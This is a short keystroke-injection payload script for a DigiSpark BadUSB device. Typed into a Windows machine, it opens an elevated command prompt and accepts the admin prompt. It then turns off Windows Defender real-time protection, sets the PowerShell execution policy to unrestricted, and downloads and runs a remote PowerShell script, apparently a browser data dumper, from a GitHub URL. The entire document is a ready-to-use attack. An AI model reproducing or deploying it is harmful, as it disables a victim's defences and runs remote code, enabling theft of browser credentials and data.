REM let the HID enumerate
DELAY 1000
GUI r
DELAY 300
STRING cmd 
DELAY 500
CTRL-SHIFT ENTER
DELAY 3000
ALT y 
DELAY 1000
STRING cd C:\
ENTER
DELAY 1500
STRING powershell
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 3000
STRING set-executionpolicy unrestricted
ENTER
DELAY 2000
STRING New-Item "$($env:LOCALAPPDATA)\DigiSparkDump" -Type Directory
ENTER
DELAY 2000
REM  *** Realiza o Download do .ps1 e Executa o .ps1 ***
STRING (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/LeozinH1/BrowserDumpDigispark/main/script.ps1", "$($env:LOCALAPPDATA)\DigiSparkDump\script.ps1"); powershell "$($env:LOCALAPPDATA)\DigiSparkDump\script.ps1";
ENTER
